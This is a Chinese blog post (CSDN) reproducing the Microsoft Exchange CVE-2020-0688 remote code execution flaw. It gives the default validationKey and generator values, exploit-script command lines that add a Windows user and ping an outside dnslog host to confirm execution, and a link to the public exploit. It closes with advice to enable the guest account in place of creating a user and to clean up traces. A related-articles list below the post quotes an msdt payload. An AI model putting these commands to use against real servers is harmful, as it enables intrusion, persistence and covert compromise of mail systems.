CVE-2020-0688 exchange远程代码执行漏洞

最新推荐文章于 2024-05-31 15:29:33 发布
最新推荐文章于 2024-05-31 15:29:33 发布
阅读量2.1k 收藏 4
点赞数
分类专栏: 主机漏洞复现 漏洞复现 文章标签: Exchange CVE-2020-0688 安全漏洞 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/117454919
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

影响版本:

Microsoft Exchange Server 2010 Service Pack 3

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

漏洞介绍:

所有Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。攻击者可以在ExchangeControl Panel web应用上执行任意.net代码。当攻击者通过各种手段获得一个可以访问Exchange Control Panel (ECP)组件的用户账号密码时。攻击者可以在被攻击的exchange上执行任意代码,直接获取服务器权限。

 

注意事项:可以访问Exchange Control Panel (ECP)组件的用户,EXP使用的时候不能含有中文路径!!!

准备工作:

--validationkey=CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因)

--validationalg = SHA1(默认,漏洞产生原因)

--generator=B97B4E27(基本默认)

--viewstateuserkey = ASP.NET_SessionId(可以通过手工获取变量,也可以通过脚本模拟用户登录获取该值)

以上4个值中仅需要用户登录之后访问/ecp/default.aspx 界面在header里面获取ASP.NET_SessionId,其余的均为默认值

 

 

图片

图片

复现场景:

1. Windows Server 2012 R2 Datacenter

Exchange2013-x64-cu23

2. Windows Server 2012 R2 Datacenter

   Exchange2016   15.1.225

Exchange版本号查看方法:

官网给出的版本对照:

https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2016

 

在默认登陆界面右键查看源码:

图片

图片

图片

 

使用方法:

python CVE-2020-0688_EXP.py -s https://192.168.1.152 -u test@exchange2016.com  -p !QAZ2wsx -c "cmd /c calc.exe"  在目标机中打开计算器

 

-s 地址

-u 用户名

-p 用户名密码

-c 命令

 

图片

 

图片

python CVE-2020-0688_EXP.py -s https://192.168.1.152 -u temp@exchange2016.com  -p !QAZ2wsx -c "cmd /c  net user ad !QAZ2wsx /add"

添加新用户ad

图片

 

注意事项:可以访问Exchange Control Panel (ECP)组件的用户,这一点非常重要!!!

目前GitHub公开的exp利用工具很多都是作者用超级管理员账号进行的测试,但是对于普通用户来说,是无法进行使用的,所以本次复现中使用的exp是一个比较好的利用工具,可直接使用

链接地址:

https://github.com/Yt1g3r/CVE-2020-0688_EXP

关于后渗透阶段:

可参考:

https://www.freebuf.com/company-information/211051.html

 

1. 判断是否存在漏洞:

在判断是否存在漏洞中,从最初的版本利用来看,可以对未安装cve2020-0688安全补丁的Exchange Server 2013所有版本、Exchange Server 2016(截至2020年3月17日之前的版本)、Exchange Server 2019(截至2020年3月17日之前的版本)有效。在未打补丁的情况下,基本上算是一个通杀。

具体来讲,可以通过以下方式判断:

1)查看版本号和官网的版本进行对比

图片

图片

2)通过普通用户登录之后,访问https://exchnage/ecp/default.aspx

图片

如果默认值为B97B4E27,且在headers中存在ASP.NET_SessionId则可能存在漏洞。

 

图片

图片

2. 判断存在漏洞的版本是否攻击成功

1)在渗透初期可以使用dnslog来探测命令是否执行成功,示例如下:

首先打开网址:https:dnslog.cn

图片

使用命令如下:

python CVE-2020-0688_EXP.py -s https://192.168.1.160 -u Administrator@exchange2016.com -p !QAZ2wsx -c "cmd /c ping %USERNAME%.3d3uhm.dnslog.cn"

图片

图片

 

 

由此可以检测攻击有效。

注意事项:在实际测试中,最好DNSlog服务自行搭建,申请临时域名来测试。

 

3. 攻击操作

https://www.freebuf.com/company-information/211051.html

可参考以上链接的内容,获取某个用户的密码账号等信息,方法有很多。

最好不要新建用户,可以采用激活guest的方法来,后期也要痕迹清理。

 

更多信息尽在:

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

 

 

乌鸦安全
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exchange-CVE-2020-0688(RCE)
bring_coco的博客
08-29 232
当攻击者通过各种手段获得一个可以访问Exchange Control Panel (ECP)组件的用户账号密码,就可以在被攻击的exchange执行任意代码,直接获取服务器权限。CVE-2020-0688也是因为viewstate反序列化。
漏洞通告】微软Exchange远程代码执行漏洞CVE-2020-0688)处置手册
爱国小白帽
02-27 5111
漏洞通告】微软Exchange远程代码执行漏洞CVE-2020-0688)处置手册 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0012 2020-02-27 TAG: 微软、Exchange远程代码执行 危害等级: 高,攻击者利用此漏洞可实现远程代码执行,从而控制Exchange服务器。 应急等级:...
CVE-2020-0688 远程代码执行漏洞
最新发布
good good study
05-31 616
漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。使用普通域用户hacker登录管理中心/ecp/,定位到/ecp/,在其响应头中获取ASP.NET_SessionId 的值。攻击者可以在 被攻击的exchange执行任意代码,直接获取服务器权限。
CVE-2020-0688 Exchange 远程代码执行分析
smellycat000的专栏
03-01 1114
聚焦源代码安全,网罗国内外最新资讯!关于如何利用该漏洞,ZDI的博客中已有介绍。但是关于这个漏洞的细节还未看到有更多的披露。本篇将补充分析该漏洞的细节。01.漏洞简介Microsoft...
登录页面验证管理员身份核心代码_CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞...
weixin_39590989的博客
12-06 211
转载:nosec 作者:iso60001本周二,微软发布了一个Important级别的补丁,解决了Microsoft Exchange Server中的远程代码执行错误。此漏洞是由一位匿名研究人员报告给我们的,它影响了Microsoft Exchange Server的所有版本,直到周二的补丁才被修复。下面是这个漏洞的一个快速演示视频:https://youtu.be/7d_HoQ0LVy8最初,...
Exchange反序列化漏洞复现CVE-2020-0688
whojoe的博客
06-26 2638
Exchange反序列化漏洞复现CVE-2020-0688)环境搭建 环境搭建 win2008r2 Exchange2013 下载地址https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=57826
CVE-2020-17144 Exchange远程代码执行漏洞复现
K8哥哥
12-10 3038
漏洞简介 漏洞是由程序未正确校验cmdlet参数引起。经过身份验证的攻击者利用该漏洞可实现远程代码执行。 该漏洞CVE-2020-0688 类似,也需要登录后才能利用,不过在利用时无需明文密码,只要具备 NTHash 即可。除了常规邮件服务与 OWA外,EWS接口也提供了利用所需的方法。漏洞的功能点本身还具备持久化功能。 影响版本 Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 31 EXP用法 条件: Exchange2010;
[Timeline Sec] - CVE-2020-16875:Microsoft Exchange RCE复现1
08-03
CVE-2020-16875:Microsoft Exchange RCE复现】这篇文章讲述了Microsoft Exchange Server中存在的一种远程代码执行(RCE)漏洞,该漏洞可能导致恶意攻击者在系统用户上下文中运行任意代码。文章由作者zhang0b@...
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升...CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p443 <host>
CVE-2021-26855
03-12
CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞在2021年初被公开,并且迅速引起了广泛的关注,...
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞... 它可以与CVE-2021-27065一起使用以实现远程命令执行漏洞触发要求 Vulnerability in the target server The target exchange server must be a load balancing se
CVE-2020-0688_EXP:CVE-2020-0688_EXP自动触发有效载荷和加密方法
03-20
CVE-2020-0688_EXP CVE-2020-0688_EXP自动触发有效载荷 python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: http://ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD -c C
cve-2020-0688:cve-2020-0688
03-20
cve-2020-0688 用法: usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: http://ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Password -c CMD, --cmd CMD
CVE-2020-0796.py
01-04
CVE-2020-0796的漏洞poc,遵守pocsuite3标准
Proxylogon-exploit:proxylogon漏洞-CVE-2021-26857
03-12
漏洞源于 Exchange Server 中的身份验证机制缺陷,允许未经身份验证的远程攻击者在目标服务器上执行任意代码。这种攻击方式被称为“ProxyLogon”,因为它涉及到Exchange Server中的Web服务组件,特别是Outlook Web...
Exchange漏洞
Fiverya的博客
02-07 2339
Exchange漏洞
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1144
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
【AppScan深入浅出】修复漏洞:会话标识未更新(中危)
编程的世界
08-31 3787
关于“会话标识未更新”,其实我觉得应该是颇有争议的,为何登录后不更新会话标识就会存在危险,是不是担心读取到旧会话中存在Session的取值呢?这个恕我不懂。   关于漏洞的产生 “会话标识未更新”是中危漏洞,AppScan会扫描“登录行为”前后的Cookie,其中会对其中的JSESSIONOID(JSP)或者 ASP.NET_SessionId(ASP)进行记录。在登录行为发生后
Exchange Server反序列化漏洞复现(CVE-2020-0688)
谢公子的博客
07-10 2543
漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码漏洞影响版本: Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值